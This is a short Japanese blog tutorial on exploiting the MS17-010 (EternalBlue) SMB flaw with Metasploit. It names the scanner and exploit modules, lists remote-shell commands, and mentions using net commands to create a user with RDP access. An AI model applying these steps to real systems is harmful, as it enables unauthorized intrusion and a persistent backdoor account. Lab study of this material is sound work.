yzbtdiy

yzbtdiy

github
bilibili

MS17-010 脆弱性の悪用

Metasploit Framework の使用#

  1. msfconsoleコマンドを実行し、msf ターミナルに入る

  2. ms17-010 関連モジュールを検索する
    image

  3. auxiliary/scanner/smb/smb_ms17_010モジュールを使用してスキャンする
    image

  4. exploit/windows/smb/ms17_010_eternalblueモジュールを使用して脆弱性を利用する
    image

  5. 脆弱性利用に成功したらシェルに入る。helpコマンドを使用するとサポートされているコマンドを確認できる
    image

よく使うコマンド:
lcd ローカルディレクトリを切り替える
lls ローカルファイルをブラウズする

cd リモートディレクトリを切り替える
ls リモートファイルをブラウズする

upload ローカルファイル リモート位置 ファイルをアップロードする

shell リモートシェルを呼び出す
image

cmd ではnetコマンドを使用してユーザーを作成し、rdp アクセス権を追加できます

image

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。